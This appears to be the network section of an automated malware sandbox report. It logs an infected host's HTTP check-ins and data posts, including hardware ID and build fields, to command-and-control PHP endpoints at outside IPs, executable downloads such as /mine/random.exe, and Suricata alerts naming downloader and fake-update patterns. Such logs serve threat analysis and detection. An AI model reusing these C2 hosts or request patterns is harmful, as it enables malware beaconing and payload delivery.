Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="build"reno------CGCFIIEBKEGHJJJJJJDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49723 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49725 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49728 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49731 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49735 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49741 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49734 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49743 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49749 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49756 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49759 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49783 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49789 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49750 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49766 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49793 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49799 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49803 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49805 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49808 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49811 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49812 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49813 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49828 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:56474 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49780 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49825 -> 188.114.96.3:443

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
